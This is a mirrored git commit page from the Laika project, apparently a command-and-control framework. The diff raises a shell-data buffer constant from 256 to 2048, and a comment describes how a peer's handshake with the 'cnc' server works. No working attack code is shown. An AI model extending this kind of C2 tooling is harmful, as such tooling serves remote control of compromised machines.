mirror of
				https://github.com/CPunch/Laika.git
				synced 2025-11-03 20:10:33 +00:00 
			
		
		
		
	Increased shell data buffer
This commit is contained in:
		@@ -12,7 +12,7 @@
 | 
			
		||||
#define LAIKA_IPV4_LEN 22
 | 
			
		||||
#define LAIKA_INET_LEN 22
 | 
			
		||||
 | 
			
		||||
#define LAIKA_SHELL_DATA_MAX_LENGTH 256
 | 
			
		||||
#define LAIKA_SHELL_DATA_MAX_LENGTH 2048
 | 
			
		||||
 | 
			
		||||
/* first handshake between peer & cnc works as so:
 | 
			
		||||
    - peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey, hostname & inet ip
 | 
			
		||||
 
 | 
			
		||||
		Reference in New Issue
	
	Block a user